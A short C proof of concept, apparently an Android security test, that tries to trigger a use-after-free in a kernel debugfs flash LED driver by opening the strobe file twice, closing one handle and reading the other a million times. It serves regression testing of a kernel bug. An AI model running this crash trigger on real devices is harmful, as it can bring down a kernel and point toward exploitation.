| /** |
| * Copyright (C) 2017 The Android Open Source Project |
| * |
| * Licensed under the Apache License, Version 2.0 (the "License"); |
| * you may not use this file except in compliance with the License. |
| * You may obtain a copy of the License at |
| * |
| * http://www.apache.org/licenses/LICENSE-2.0 |
| * |
| * Unless required by applicable law or agreed to in writing, software |
| * distributed under the License is distributed on an "AS IS" BASIS, |
| * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. |
| * See the License for the specific language governing permissions and |
| * limitations under the License. |
| */ |
| #include <asm/ioctl.h> |
| #include <errno.h> |
| #include <fcntl.h> |
| #include <pthread.h> |
| #include <stdio.h> |
| #include <stdlib.h> |
| #include <string.h> |
| #include <sys/mman.h> |
| #include <sys/wait.h> |
| #include <unistd.h> |
| |
| #define SIZE 64 |
| |
| void trigger_crash(int fd); |
| void testuaf(void); |
| |
| void trigger_crash(int fd) { |
| int i, ret = -1; |
| int count = 1000000; |
| char buf[SIZE] = {0}; |
| |
| for (i = 0; i < count; i++) { |
| ret = read(fd, buf, SIZE); |
| } |
| } |
| |
| void testuaf(void) { |
| const char *infopath = "/sys/kernel/debug/flashLED/strobe"; |
| int fd1 = -1; |
| int fd2 = -1; |
| |
| fd1 = open(infopath, O_RDWR); |
| fd2 = open(infopath, O_RDWR); |
| close(fd2); |
| trigger_crash(fd1); |
| } |
| |
| int main(int argc, char *argv[]) { |
| testuaf(); |
| return 0; |
| } |
